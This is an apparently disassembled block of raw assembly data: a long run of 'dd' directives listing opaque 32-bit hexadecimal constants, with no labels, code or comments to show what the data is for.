		dd 75C1FA0h, 0FA555B83h, 0BD68EBB6h, 9FFB171Ah,	6F595689h
		dd 79683277h, 8A44EDCBh, 830DF34Ch, 17B65B12h, 0B57904DBh
		dd 3401EFBBh, 0D23756ADh, 44E6E8E9h, 44A4DE3Bh,	0C1033A3Ah
		dd 0D404D195h, 0C9376769h, 0C14B6DD6h, 0E1BBD362h, 8D0C8522h
		dd 853EF994h, 49F76078h, 3BBE2FFh, 0AFE4BF3Fh, 0E69856AEh
		dd 2F50C05Eh, 0E7C24A9Bh, 0F1CCC8B3h, 0AD561EC9h, 15B7E26Bh
		dd 0B3F62F5h, 7686D72Bh, 0B73BF944h, 25EDFD94h,	22A8D65Eh
		dd 0FD9F76D6h, 8CFA7DEBh, 0DA7B8296h, 0EE12495Bh, 27D58A77h
		dd 0A1362092h, 2E8D3A92h, 4ECD046Ch, 962AB48Bh,	27031096h
		dd 9C5BAF37h, 95D3518Bh, 18DA4060h, 0E87A8EBAh,	64B9380Ah
		dd 0DF9D60FFh, 0D6417689h, 10144356h, 0D12DF86Ah, 0C16A2A9Ah
		dd 68AAEEC4h, 68F98BD6h, 9C12A679h, 7F52DE5Dh, 8FA64F65h
		dd 0D533F12Eh, 0E7743351h, 0DF07AF37h, 0FF53EE45h, 5B4FD3EAh
		dd 5BF6AC6Ah, 69BDFDE5h, 0AB6080E3h, 4774AFB1h,	0FE896715h
		dd 0E85C7F4Ah, 2FBE1A58h, 0E8AE7E2Ah, 0DE454622h, 79F1B62Bh
		dd 38941020h, 929167E6h, 0C294A950h, 19C5E414h,	0BF15E33Ch
		dd 26CCDC6Ch, 9C983A80h, 0BD8CF02Dh, 0EA5B3CAh,	5EDF5AF7h
		dd 89978F7Ch, 546AB16Ah, 2DFE290Ch, 0B1B6A084h,	88E133B3h
		dd 59AE8234h, 86DDDA55h, 0B91D9ACFh, 5B74513Dh,	6B4EEABFh
		dd 689061D4h, 0FCB02EAh, 19A0287Eh, 0D57EA352h,	0DDBC2F51h
		dd 3D892967h, 3F7E5AFDh, 9F96F073h, 6F04143Eh, 0CAD355BEh
		dd 0A75A397Fh, 16885EAFh, 0B9556F23h, 2EB0255Fh, 0FE715874h
		dd 0F912B9A3h, 0BA3A2805h, 0A2A60837h, 2C0CA341h, 0ACBD58Ah
		dd 7664D129h, 0F73AC9B2h, 0C3D16A85h, 0F2B6F840h, 370781FBh
		dd 8852DA09h, 80E38EA6h, 1DFEA524h, 0C495DE9Eh,	2B8DB01h
		dd 6CA47AC6h, 0AEDE1D53h, 0CA307EE4h, 0E8DA88FBh, 116CB477h
		dd 0B4B36C8Ah, 9D638767h, 0FF1E61E6h, 89E831A5h, 8B5E79BCh
		dd 9AD33A93h, 0C9DBD45h, 9436E55Ah, 395ACBEFh, 0E13856ACh
		dd 75AD0752h, 0A43675B0h, 19933B7Bh, 5894761Fh,	361C7E5Bh
		dd 435842EDh, 0EED6B3B7h, 7DFF76Dh, 0DAAA0EF6h,	0FB5F4584h
		dd 0C1F00FFCh, 122FB620h, 685CC22h, 0D6A0B5AFh,	0B17AA7D9h
		dd 0DA422187h, 3B94A46Dh, 5C35621h, 45627575h, 0F287556Bh
		dd 6EAFB5DEh, 10E58D67h, 0DDF844BDh, 70233A49h,	687EADC9h
		dd 3C513993h, 0D06C0BDFh, 64B3FDB1h, 0AAD1280Ch, 5EBBD652h
		dd 6E517716h, 0AE608045h, 0FCAF50E8h, 2BF0945Bh, 0DA2DDE4Eh
		dd 1CAF7F93h, 6FFC8213h, 48CFC430h, 9EA7551Bh, 9B70D51Bh
		dd 0D4A5996Ah, 9160AC99h, 0D347AEB9h, 274555ECh, 15C5699Fh
		dd 6F1011A8h, 7CEA76DCh, 0E6782CDCh, 1B9A22A6h,	0F6B7D249h
		dd 289FFA17h, 0E2C6689Ch, 5D0BF703h, 0FCCF1DC7h, 0C4DFAB9h
		dd 0DB9BAAECh, 0F0D6BE08h, 0F16DA4ADh, 9399B14Eh, 0B824BC3Fh
		dd 68879190h, 9DB19A5Ch, 9C7545DEh, 53975C19h, 0C8AF5DB7h
		dd 65B39C92h, 497C05FFh, 0F435F03h, 5C7B684Eh, 91B77380h
		dd 0BB7DAFD3h, 4A5CC239h, 236BD58Fh, 7E684C47h,	2A199815h
		dd 607ADE17h, 0B525A6B6h, 8AEF5FAAh, 0CB975471h, 9A410662h
		dd 1EC05D01h, 0E53013EBh, 0DDB01754h, 83C53EDAh, 0FBCAF61Fh
		dd 0FE558848h, 96652444h, 0A0C03B47h, 319B2B50h, 0BF8EFAF5h
		dd 0F362B564h, 1DD7ABB8h, 128AC7A2h, 1292EE60h,	43B16984h
		dd 9F4DF5EBh, 69EDB578h, 267CD6E1h, 50403BDBh, 97443DA3h
		dd 470778A5h, 0C0F3118Dh, 0FABECF1Dh, 0BBEFF73Ah, 0F61BA4BFh
		dd 806B8A35h, 5776031Ah, 3522D0C2h, 59F3DE94h, 5BA38D3Ah
		dd 0E3701709h, 82683266h, 1BBFFC64h, 5031A59Bh,	43FA93Ch
		dd 0E5865D8Ch, 84EF11B0h, 892D3E9Eh, 6A3CC989h,	0B56551B4h
		dd 0DB4C1EFCh, 8BA47F91h, 2FE16E1Fh, 0F674DAC3h, 653995C0h
		dd 0BC86BDA8h, 0FC3BCAD9h, 0C48193A0h, 0F2D0228Ah, 6EB05D8Fh
		dd 9FCBF763h, 7942CA40h, 5C8F258Dh, 9927DB63h, 0A61BE8B2h
		dd 8BD342D6h, 8E036D78h, 6EAB6DB8h, 0AA2E8DCFh,	9CDBC1E2h
		dd 9EF034B3h, 29952945h, 9585F03Ch, 0F2AA0F4Bh,	0BF53C55Fh
		dd 0BF2B3BBFh, 807AB52Bh, 0B68C583Eh, 0A1C8FD7Dh, 359FCCBEh
		dd 92E65496h, 0EEEACC39h, 0D7AEB187h, 6D26F1BDh, 0F97E9CF3h
		dd 8666BD0Ch, 0F4203702h, 0D691C8BEh, 0E01B25B0h, 0C85B29EBh
		dd 0DD4D7832h, 0F1CD6428h, 0BEA58E07h, 6725EE9Eh, 0DDBBCBB6h
		dd 1E897DE5h, 0B86B6B22h, 0AD83265Bh, 14EA3333h, 0D5150EFEh
		dd 68D98A9h, 92C70E07h,	0BD41756h, 85A05FA9h, 0EE6D1120h
		dd 4C12699Ch, 8FC794C5h, 194CB46h, 0CA1F1752h, 0FC3AC023h
		dd 569D1F82h, 5DE02919h, 6AD34D22h, 0D577D8BEh,	2B4CE4Ah
		dd 52D99E22h, 0D7C5682Ah
		dd 0A339629Ah, 65BD18BEh, 0CCAE68A6h, 0BD98B84Ah, 4FFA1AAAh
		dd 0DFD49E8Fh, 4BBDE932h, 0EA5196B4h, 4CFE206h,	0B82FDECDh
		dd 15AF9A15h, 27DF2C3Fh, 0C2D5A183h, 1CF1AB8Dh,	0BD46951Fh
		dd 371FE711h, 3D8B465Ah, 20495751h, 7CA2669Ch, 7E37B837h
		dd 24559D8h, 0BA4889E7h, 57DF8286h, 85508F1Ah, 0B2F96DA3h
		dd 48FAB45Dh, 0D1162978h, 88933BCEh, 42FDCF9Dh,	3BEDD401h
		dd 0E1F9FCD6h, 77127276h, 0A90AC3Bh, 330FDCC5h,	72D418BAh
		dd 6BEDE041h, 7619FD2Bh, 0A2709664h, 7D1385Ah, 0AEF10B3Dh
		dd 81C2E896h, 55500989h, 9B55F8F8h, 0A44E8ECEh,	5571E558h
		dd 0AEEE6533h, 6B282DA7h, 0F9205C1Dh, 8CD2C6E0h, 0DC862A6Fh
		dd 208149FCh, 3C91E5A5h, 7FB91ACh, 0D9691E06h, 5CBEB98Ch
		dd 0A7F6F0Ch, 0FB440F26h, 51199DD5h, 2BEBE7C2h,	813DB477h
		dd 8E4F9489h, 0B2F78915h, 0EA5A7607h, 1F8097E0h, 0D68E8888h
		dd 0C2E4D66Ah, 81AC975Eh, 1F96D554h, 0BA36745Ch, 2C3F9BE6h
		dd 0ED835F1Ah, 5D2F078Ch, 4CE10569h, 0CABA32B7h, 0EADFACF8h
		dd 3EA41122h, 0B56A3002h, 7C0EDA56h, 0DD393606h, 0D000CB8Dh
		dd 0AF3589E8h, 9607B276h, 0D025A38h, 0B2DDF315h, 59B276DEh
		dd 0B7B2A046h, 84584A53h, 0CDDC52DEh, 67014A70h, 383046A7h
		dd 0D59A17D7h, 7328BF0Ah, 6FEEC046h, 7D6E0236h,	9F7DAAF9h
		dd 4DE8BDBAh, 6A2C901Ah, 0F6C9773Ah, 150FC150h,	235276B7h
		dd 243AB5C6h, 0A615B451h, 8533E85Ah, 0FBED6FACh, 0BF8D6695h
		dd 0F93F5F1Eh, 6EA66D59h, 0A291A909h, 5983B5EEh, 0D6D5244Eh
		dd 77ABB72Ah, 0FCB506B8h, 31E5CCD0h, 71F5805Bh,	2E0E70F1h
		dd 9BCA553Eh, 5578FB1Bh, 2C2AAA12h, 0CA63A9CEh,	6AF1F86h
		dd 583547A2h, 48BF17D0h, 73D1A36Dh, 0CBDEFE85h,	942E7CF7h
		dd 1E7C9BB5h, 45C30F1Eh, 4C61A64Ah, 7B3C6ABh, 0E9FE6B8Eh
		dd 0B6BC70B3h, 12C4005Bh, 45828764h, 0B87EB952h, 0DD0A7D0h
		dd 0F6EF7071h, 0A256D7BAh, 0A73943B4h, 0F6D400A4h, 12D155E0h
		dd 5E21CBB4h, 1C0759C1h, 0FF620A4Fh, 5EEEFBCEh,	0CC415D5Eh
		dd 0C7266135h, 0B4B45700h, 55DA4CC9h, 0EBCBF80h, 825A68AAh
		dd 6DE3E80h, 2F309D55h,	0D5AC8DE1h, 0CC254156h,	370E6B9Fh
		dd 3F0175F9h, 3BB3E8FCh, 0F8D6B6E8h, 61D7DA6Dh,	7D8A8FB7h
		dd 0C9291912h, 0CF6137F2h, 8E64F2D2h, 7483BC35h, 77B65DD2h
		dd 378EA9ACh, 363F0A33h, 11F0B21Ch, 6A21C37Eh, 0B4ED3594h
		dd 0BAC4F8ECh, 0BB94B1A8h, 0F94007DFh, 0CEA9CCC2h, 0E6C8ABCFh
		dd 90149C5Fh, 8AC83E3Fh, 7DF7290Fh, 89CB4A40h, 0F5393F5Bh
		dd 6CAF55D3h, 57FBB514h, 0BEACD702h, 8672DFE8h,	0CBABD146h
		dd 0B8B808BEh, 727369BFh, 0C0F046F6h, 2BEC0B2Dh, 49D5A936h
		dd 0AFD0F8F4h, 1E3093ACh, 0A8244DE2h, 1ABDAC8Ch, 8436622Dh
		dd 0C8AEC17Fh, 0FDFE8502h, 74F08389h, 27A25A55h, 0DA955BFDh
		dd 0FCE22FA6h, 8C60075h, 87495D38h, 9C7D04A7h, 2384C8E5h
		dd 4281432Bh, 60947C68h, 91C8716Ch, 0A8B32287h,	0D098FB84h
		dd 35473E49h, 4924337Ah, 0EBE480FBh, 4D4BF3CCh,	58325B7Ah
		dd 94AA8BFBh, 0AA46F5B5h, 92EC8B3h, 0A7C113Eh, 0F17143Ch
		dd 0DA397ABCh, 0ED951F7Ah, 63B47369h, 7F26855Fh, 4E11EAC4h
		dd 0D9C1D4B1h, 0A6B36120h, 76CD5BF1h, 0BB1FDB46h, 35F6612Ch
		dd 9C6B1DECh, 0B4BE2A5Fh, 7DAA65FBh, 84B9A8EEh,	54B9BEDDh
		dd 5A825553h, 6DF71591h, 648D8774h, 8FB10B80h, 68BD0226h
		dd 1352F135h, 0F4605115h, 0FB7B9C6Dh, 8D4C230Fh, 9C05B3BFh
		dd 0BDCA4AC7h, 19BB4B13h, 80AB607Bh, 78BA5776h,	595F2A58h
		dd 0E45BD935h, 0DD73C214h, 0C8E580D7h, 32FC50D0h, 2C8E6C1Ch
		dd 6E5D1CEEh, 48A5DC11h, 40121531h, 55C4D95Fh, 0AF31A768h
		dd 2D3B6206h, 973313CFh, 95E7CC5Fh, 4326CCDEh, 6E3AA283h
		dd 338CA0AAh, 668558B5h, 0A8AB4C53h, 176FA365h,	1E2FFE97h
		dd 0ECB8F6D0h, 991E3B6Eh, 2370BF0Eh, 76E7F449h,	0E6155Ah
		dd 6E5ADF9Bh, 0C769608Bh, 0B620B49Bh, 0FDF67B56h, 34CCC86Bh
		dd 3E06FE20h, 0EAA4F070h, 0A59D66D1h, 26D3BB77h, 0C09D7C18h
		dd 25E321D0h, 0B641E64Ah, 0F3FE89D8h, 0CE73BAA1h, 2AA5D655h
		dd 2751607Dh, 223149D5h, 0E95FDE78h, 0F5A65AC4h, 754F1FEFh
		dd 0A3ADDEFBh, 9E532225h, 3619B15Ah, 5E37B8AEh,	9985F098h
		dd 7FEB0EE2h, 2BFFAD3h,	0B47BD4E8h, 30B60CA8h, 0EF9BB70Ah
		dd 0BA59FBA0h, 0F0EF82F5h, 0B68EF20Bh, 0F4917CFBh, 254FC5E1h
		dd 82F86EFEh, 0AA8A421Fh, 0BF25188h, 3849D501h,	0ABBBD92h
		dd 0BF9D732Ah, 12EED6CDh, 0E2BFD5EDh, 0CDDB94Fh, 5F9F6395h
		dd 4C676A4Eh, 698116B2h, 0E24141D3h, 2D2D70C2h,	0FCDFFC5Ah
		dd 0BCC85311h, 0B3235C36h, 0BC077E1Eh, 56BF1D7Bh, 557F17EBh
		dd 0F433B359h, 0F5F7A22Fh, 0A9EA0B68h, 0FFD8AC2Bh, 0C7BB73B5h
		dd 865C6A9Ch, 0ACBE256Ah, 0EBDC141Dh, 13363340h, 0B460ADBDh
		dd 2E4DAD51h, 0E19C2EFBh, 4B1F6703h, 9C3EC229h,	1F7206AFh
		dd 5D02D6E4h, 0BC44F12Ch, 3C4A3183h, 0C5E21C30h, 9116F852h
		dd 0B6354A29h, 92CFE6B5h, 2605B8EBh, 3344092Bh,	8E93DCCDh
		dd 0BEFF188Ah, 155FD608h, 607F336Bh, 613D0010h,	0F5A3D16Ch
		dd 44493022h, 0D82A7C1Eh, 0DC6DF30h, 0A58C747Dh, 339F7BC1h
		dd 0EAE5B6D9h, 0E808F864h, 40A1AD88h, 5D4234DBh, 4EAAC1DBh
		dd 422FC6CFh, 0B7C900F1h, 0D4B1BFD4h, 0FC7CE7FEh, 6C74BA22h
		dd 5EF66727h, 7C563EC9h, 7BE7EEFFh, 34C88A7Fh, 0D5EEF45Dh
		dd 0D1D06C43h, 461B5738h, 0D9B7B2A8h, 2DC43917h, 55D229D7h
		dd 36C34B3Bh, 741BBD6h,	0B4A6F4D8h, 62AF5DC7h, 6B315E0Eh
		dd 0B77970B5h, 10D06066h, 17259F5Ah, 4B065FAFh,	0B6723242h
		dd 0E6D8960Ah, 0B840D104h, 0FFA76BABh, 0BEF472A9h, 0F6EB7467h
		dd 2B841DCEh, 9F3A28ACh, 2AB3734Eh, 2E59806Eh, 0DFF50EFh
		dd 0E11A3FBFh, 2516A11Ah, 7D1B466h, 65C79E2Fh, 7B2AFD31h
		dd 79523924h, 0DA54B515h, 0AD7EC84Dh, 0BEC788CCh, 1F8164B7h
		dd 97E981DAh, 5EF3CE5Eh, 0F2320670h, 0EE0C73D7h, 56ABFC2Ah
		dd 7A39B5A2h, 0F5BA46B6h, 0EEE781F5h, 0B1787F2Bh, 0C46A83FBh
		dd 0C035C107h, 6CADD1C5h, 24F45369h, 0A90AD856h, 7AC23FB3h
		dd 0A646DD09h, 0A45971FAh, 65E12568h, 399201FFh, 0CD8F87E3h
		dd 3C3BD57Ah, 418E5E75h, 0D965418Fh, 0B98C0E9Bh, 0E7BC1C4Fh
		dd 0BCCB7526h, 96E7059Dh, 0DF5F17E8h, 2CABBCB6h, 75C62DDCh
		dd 76773C95h, 5A88A6E4h, 4DF67BDEh, 0D5C35411h,	0E29DFCD1h
		dd 0DAD156CCh, 0B51374EDh, 6AA81085h, 98656D79h, 0A957FE2Eh
		dd 0FC135E45h, 1DAADECh, 5F8C0BD3h, 0A827FE41h,	0FA9F195Ch
		dd 0E58BBEE3h, 625853Fh, 3F4C5751h, 9CFD32B3h, 0C350CB07h
		dd 8E2B9ABBh, 797324F5h, 6255BC2Bh, 9DED2AF4h, 0F411AD11h
		dd 0E87832C0h, 4FB6F6B0h, 0F83A25CBh, 2A37B42Eh, 0B39AD233h
		dd 2CF12B5h, 0F69E37D5h, 0E4EDE5B5h, 70784FD2h,	3BAC818Dh
		dd 0F8F0709Ch, 5572257Ah, 0F094FC46h, 0B327FC85h, 9153DD21h
		dd 0EB56C813h, 6D5FB46Dh, 0A6EB799Dh, 6107EE84h, 12F845C3h
		dd 4F03E3D2h, 0AF22443Bh, 6739109Fh, 524CC896h,	0D1F1A17Dh
		dd 67C0C591h, 95500076h, 3B37129Fh, 9FD74221h, 1E074436h
		dd 80B0EB33h, 0FD7E0DF5h, 0F6011160h, 0B59D0F99h, 0F5ECB73Bh
		dd 4016E9E6h, 461B5BB1h, 0DDA088A7h, 0E0A80F43h, 5F1FB2EEh
		dd 88B94B3Ch, 0D04EB3FBh
		dd 0BD2E8D82h, 5AFDAF8Eh, 252857C2h, 5AB48C2Bh,	0F4E6F021h
		dd 9AC4449Dh, 81E1BFBFh, 9DC58FB5h, 97561A7h, 0A411D58Bh
		dd 14BA7B38h, 62841DC1h, 0EE3AAE88h, 0C80AC697h, 2B057979h
		dd 694DCB60h, 8919E0Ah,	0B53BA2BEh, 0C22A005Bh,	29DD9F35h
		dd 346DAF7Ch, 0DDFEE0A8h, 5C413400h, 0E7528A6Ch, 0A716AA9Eh
		dd 0C5A21B3Fh, 0D0CE182Ah, 1D2A923Ah, 44945933h, 0A4FACAFAh
		dd 8825009Fh, 0B92FB03Dh, 6B0237F2h, 0AB685121h, 2F39A666h
		dd 0E545B0E2h, 8C2200A0h, 49E279B7h, 0E9FFBEA6h, 0ADFBA593h
		dd 0D5BC0BFCh, 1D557E2Fh, 3078297Dh, 0E98C50D5h, 0C64608E2h
		dd 7F34D68Ah, 136B81CFh, 5B090B97h, 0C89FCD55h,	72A924FFh
		dd 0AAD87B02h, 7A15FAF3h, 205D4EBh, 0F2ED91B9h,	0DD9AF1FEh
		dd 0E17768DBh, 0A9288B46h, 0B69D919Ah, 0F0C002CEh, 785E1A21h
		dd 296EF76Ah, 4EC066D5h, 0BFC31A1Eh, 0ED84F158h, 24E3DD43h
		dd 9B085C9Bh, 0D15131EFh, 0BB0D4F42h, 0D2475DC5h, 26F53BAFh
		dd 0E3F183C1h, 5676FBFEh, 1228AC9Fh, 7422CB36h,	0D5D65F95h
		dd 0A189A904h, 0F68AECA8h, 332ADC4h, 6687AAEEh,	7AF58F17h
		dd 0F3FD57B4h, 23737D7Dh, 0AAE3FE60h, 8EAFDDE8h, 2EADBC76h
		dd 7889D77Dh, 4BD3E078h, 153CBC21h, 84CF966Ah, 0A883D101h
		dd 88AE2145h, 71AEAFE2h, 0E2FAE2AAh, 0A37F1D0Ch, 0D1899354h
		dd 55A68F42h, 6F8ADAAAh, 0DCB39B34h, 7468FC86h,	7AEA8DDCh
		dd 0A2911809h, 7C1AD0D7h, 4E5E16E0h, 0BF269535h, 4B0E5896h
		dd 37224B23h, 99CD992Bh, 976E715Eh, 35FF557Dh, 0E8C43516h
		dd 0D0AF9F3Fh, 0ABA6E7BEh, 84548418h, 0FD7F55A2h, 0A4C92D10h
		dd 7177DBBAh, 0E8F6E085h, 0BBCDA967h, 2D4C8353h, 51C45DDDh
		dd 0F63ADE67h, 0B6953BB4h, 0CCE60927h, 7E3981FBh, 9FE3925h
		dd 0CC743FBBh, 9BE53957h, 0F35BB0DEh, 88D3092Bh, 7D7D46E1h
		dd 5834DE65h, 62CADDCh,	302FAD2Ah, 569BAEB9h, 4786933Dh
		dd 0F18A8645h, 0C1811005h, 0BAD25F01h, 8EF6E96Ch, 848F459Bh
		dd 12D6420Bh, 0FAA403ADh, 0AF278798h, 0F2AD427Eh, 0FAB03139h
		dd 2E725C4Ah, 16543E7Eh, 0E5BD0E26h, 34A90123h,	0FAA957E5h
		dd 732FDDCh, 2E81259Ah,	1588E603h, 2AC11B7Fh, 0AD1880A8h
		dd 256FF114h, 5CDF77D7h, 5C63F646h, 0D0A1892Dh,	56C5ADF0h
		dd 54D79A5Ch, 0D24A1D48h, 8A384B5Fh, 85060526h,	8B97765Eh
		dd 0B79274FBh, 0F25FAFC3h, 689DE9C0h, 0A2E183A2h, 0AC75E634h
		dd 0FAB89558h, 2FCFB512h, 7FBF945Ah, 88AAE979h,	0FF1B74C6h
		dd 431B27F5h, 99C856D1h, 3786B37Dh, 96AC4157h, 58C489FEh
		dd 0AB3BB754h, 0C9453792h, 0F302F2ACh, 8D3F32E0h, 0BE548338h
		dd 32EA5207h, 0D30D3F02h, 0EE35330Ah, 0F1B594B7h, 0D11B10EEh
		dd 0C373095Ah, 0F190EA35h, 45D83B66h, 9AE8E2D9h, 3895F88Ah
		dd 0DC66D3C1h, 0AB126F0Ch, 0C0FC49FFh, 0A3504FD1h, 12AB6239h
		dd 0DE43CE3Dh, 0D75768E9h, 0F1E21F91h, 0A9D64FE6h, 0E161ED14h
		dd 0DD8B4AAAh, 7414E2C6h, 9BF43D93h, 4DCA252Ah,	53770EFFh
		dd 0C2E85FAEh, 0B305827Fh, 0D5011B6Ch, 7A6F5F4Bh, 90BF9747h
		dd 0F889933Bh, 62A6EAA1h, 0AD16DE85h, 0F9E4825Dh, 0D6B16F68h
		dd 2C0FE0F9h, 90E2BF14h, 2063BAC7h, 2B7944F3h, 0D189F084h
		dd 0EE6AA503h, 82AE8358h, 7A57EFD8h, 2616A759h,	5F155A59h
		dd 68845C0Fh, 2A5D5B96h, 0FA2D3781h, 795A2FD4h,	0AC70193h
		dd 0AEBE8745h, 7E368B56h, 0B76A9908h, 1B8DE6FAh, 490572ADh
		dd 0B64BDFEFh, 0A789A818h, 9F717278h, 40792C4Ch, 3607F6C1h
		dd 0B91BEA0Bh, 3F4E124h, 0FDAF57E9h, 0B9D05EB4h, 5830543Dh
		dd 0A7438587h, 45B3EAAh, 171D0149h, 31C3D4D2h, 843631C0h
		dd 8BCEBC93h, 0B7B319D3h, 1B67212Fh, 0DE0C2904h, 9A1D4A53h
		dd 5ECA5E45h, 0B2BA3154h, 7FB12F60h, 0BB12A68Ah, 0ED9E7F8Ah
		dd 60CB57BAh, 0F11555E1h, 0AF098AFAh, 0D8D46E5Fh, 2A0383B7h
		dd 798BA4BFh, 4FC1181Eh, 43B675E3h, 6125F747h, 0F5AED2F5h
		dd 600688CBh, 0BEA1ACD9h, 95451F3Ch, 77E11372h,	0F40476B8h
		dd 5232F8EAh, 0D929037h, 9B86FF7Eh, 0C981BF13h,	2F98ECC7h
		dd 8F32E4CBh, 0E4D13774h, 0DFC4D01Dh, 0F9A98A89h, 221F140Ch
		dd 0CC461DF4h, 0A38B0E3Ah, 0B0FC0224h, 0A8047966h, 10841CBFh
		dd 855A0FAAh, 0E357A892h, 0C1D3BAC3h, 2E9DF8A0h, 0CDD36A88h
		dd 2B128682h, 383C9A37h, 0C4DADCFFh, 897F957Fh,	8F65D1BBh
		dd 0A55FB96Ah, 6D1EBB9Bh, 0FA5BACEDh, 0FB951F86h, 31155099h
		dd 48D34B4Ah, 44AC5D36h, 0C4AFAA29h, 8CAA789Dh,	58118DCFh
		dd 0E72EB226h, 1D74A177h, 65BDFAF5h, 988A8C31h,	0A537FEB5h
		dd 3D7FB5BBh, 84166962h, 87E2EF6Eh, 0F093D392h,	0E0C640Fh
		dd 44BB556Dh, 0D6C4DAB1h, 555F7D2Fh, 158BBCF2h,	13C0B736h
		dd 625BA785h, 0BA2FAAA7h, 0E204E438h, 0CD58E0E4h, 0F751BCD4h
		dd 60784383h, 593DA5A9h, 6D83F0DEh, 12607B80h, 1F7D8D36h
		dd 0D6AD78D7h, 1FEB1C8Bh, 0D9E2DDF5h, 70A54ABDh, 0EBEECD8Ah
		dd 0EA723B7h, 8BE83461h, 0CBDA45B3h, 2D6868D8h,	868EBA1Ah
		dd 6144B6D8h, 0B71063D4h, 465AF369h, 4C461906h,	113FD1BDh
		dd 0E022C9C1h, 9D4EDCFEh, 0A4955011h, 76788782h, 16FDC843h
		dd 4932B87Eh, 53F88279h, 0DECD7085h, 30F081AEh,	0B955F236h
		dd 0E8C0FFE1h, 0F40F2A7Fh, 3596F16Ah, 0FB567703h, 8B175810h
		dd 0F0B8499Ch, 5E13E76Ch, 1E11DB9Bh, 0B56BD996h, 54468955h
		dd 1C0F44F9h, 1ED1A17Ch, 8B6E6265h, 0F36A7856h,	8696E6C9h
		dd 4AA399F4h, 652F6FB5h, 0CBC657B4h, 8BF490CAh,	0ED7A1626h
		dd 0C1BB7528h, 81FE5057h, 8D623195h, 143F6B2Ah,	77CDAF84h
		dd 79DF0513h, 950FB2D1h, 1354BCF0h, 36DE42FBh, 85664CCAh
		dd 0FE3E9CD5h, 42E4D805h, 2696D82Ch, 0E4472B6Dh, 0DED021C1h
		dd 52E2DDF3h, 0C97E28C0h, 6D867978h, 579A1DB2h,	0FB8DF22Ch
		dd 20CBD383h, 0B555B8EEh, 81E37292h, 0D55DA342h, 0E46A6A4h
		dd 6D148490h, 8B17D3FBh, 0AFB83AF4h, 0EFEED1ACh, 0F93C960h
		dd 0DA3B9CE9h, 52AD2AB5h, 0B368F415h, 7D0FB268h, 0BA2DEBF2h
		dd 0AED7B446h, 90D038D8h, 0EE1FDF81h, 1909EF78h, 0B455B05h
		dd 5A9D2781h, 17F68155h, 4E2337D6h, 15A05714h, 646A0AEFh
		dd 689B24DAh, 69AFA329h, 628B2AA6h, 2CD1CBF3h, 64F7FB50h
		dd 7F5AEA00h, 2BB769D2h, 0BE0FD6BCh, 0EEFFF376h, 24A08567h
		dd 4CD9CB5Ch, 167992D8h, 6A8B09DCh, 442F6655h, 9A7FB40h
		dd 69DAFCFAh, 231CB2F5h, 0AD24A652h, 0A22B1F02h, 0C4AD8FADh
		dd 5FDDBA53h, 560E72C9h, 2EFCFD60h, 0B0FC8573h,	0CEAC612Bh
		dd 5EB04C76h, 638DA88Eh, 0ACBF4CF3h, 5C7B0A9Eh,	6AF6A020h
		dd 7D8EB395h, 0C3F107DFh, 0E454EA4Ch, 0F2B91795h, 8CB52546h
		dd 28186A96h, 86C49249h, 0D7A6D22h, 7AE89B10h, 0EAF70579h
		dd 0D82A7E30h, 0CD9A3540h, 4B0FFCC5h, 9BCD4105h, 566ACC07h
		dd 31324AC8h, 0F2750AC6h, 6D1557A2h, 6585F651h,	65777FBEh
		dd 0FD6B0DC6h, 0F18AE0E3h, 0AC73E543h, 0FBF12282h, 1EDF4FAFh
		dd 6070A873h, 0A5FA842Ah, 19B78122h, 3166A1F8h,	0AB8D303Bh
		dd 0DDB6A78Bh, 10C4992Fh, 97E12C06h, 37680266h,	947A3940h
		dd 630387DAh, 0EE766E3Ch, 0FEC1C299h, 0BB4452E7h, 173443FBh
		dd 6AB1B6EFh, 3CB84A05h, 13BD91EBh, 49AF703Eh, 213FAACEh
		dd 0A373A3B6h, 0FF1F3485h, 0B5B6339Ch, 51B8B70Eh, 0B21BE108h
		dd 0A614C345h, 4768EF42h
		dd 29E01D3Eh, 0EE76BA7Fh, 381CFB8Ch, 0BEA0F4BAh, 0CB9E75F0h
		dd 96A14592h, 95DF346Ah, 99955E6Bh, 930FA1B2h, 72D3B411h
		dd 74A0DD2Eh, 0BA24869Bh, 32BFE376h, 206B9C10h,	4B0B3A6Ch
		dd 0E396092Ah, 0AB0E2D19h, 0E275A80Ah, 395D3054h, 0F6D202Bh
		dd 0E0B1112Eh, 7DA24303h, 0DD9442D2h, 0B54BEAB5h, 2B6EB7AEh
		dd 20FA4C30h, 0E76CA7FBh, 78748DA5h, 4CFF0818h,	1C056FBEh
		dd 85C107DFh, 706F19FFh, 0BCEAC941h, 0E54E8F7Ch, 0BB4FE46h
		dd 3E15D056h, 0D216883Ah, 0CDA79BB4h, 56858777h, 827B8CA1h
		dd 283C557Ch, 9ADA18FEh, 0BC5C4831h, 80622F04h,	51DD7EBh
		dd 0CC7891D4h, 4D34A3FCh, 0F363E32Ah, 0AE5E2206h, 45A86D61h
		dd 1DF84EEBh, 7D8109BEh, 0F936BAC4h, 6CEB597Ch,	2C9FFB67h
		dd 0F379A320h, 0B06A696Fh, 0E70D8857h, 7F991737h, 0B46A089Fh
		dd 6A3A59A8h, 46977771h, 0A8ADE481h, 0DF2B11A5h, 5FF37961h
		dd 97C14481h, 5BBAB528h, 0D5A26675h, 6C177FEDh,	7A73D4BCh
		dd 36FBF377h, 0ADDBB61Bh, 62E0AD1Eh, 297BD028h,	4EF9DF06h
		dd 0BE1A98B4h, 36A70087h, 17F3CFBFh, 40BE24CDh,	0F38B9BB6h
		dd 0EAA425F8h, 6DC6C432h, 0FC7EE0ABh, 0E73433B0h, 0AEDAED75h
		dd 483EBA15h, 5B313F7Dh, 3DC145D4h, 7CAE9D7Fh, 7C5BA24Ch
		dd 3AEAE4BBh, 881A4A50h, 0A524F10Dh, 15B25F72h,	3C6C11A0h
		dd 21944ABAh, 445A0FEFh, 96D2A9DCh, 0F7E1C037h,	1B5280E9h
		dd 3D276E3Dh, 0BFBF7462h, 5BA5F6A5h, 0F6A51EF3h, 308FA371h
		dd 0CE34CC9Fh, 0D0132EFCh, 78F3971h, 52889E1Bh,	301AEF50h
		dd 0B6DBA4EBh, 4C3CF56Dh, 0E68179D6h, 699651AAh, 8CA9563Ch
		dd 0B096AA1Fh, 0EA46AFBCh, 0FC087C0Ah, 0C74BF6F1h, 917AB6FAh
		dd 29606230h, 562D04C0h, 0CC0FD935h, 0DC94653Eh, 0F8D84753h
		dd 1C0641E1h, 0EDB7E7D8h, 0FC69A235h, 5592DB4Bh, 0A4E47B6Ch
		dd 0A3511F89h, 52E81AD1h, 139F255Bh, 0A164FE81h, 0D4C67146h
		dd 0F7C99BE0h, 0FF784651h, 95F24094h, 5554E18Dh, 8EE9816Fh
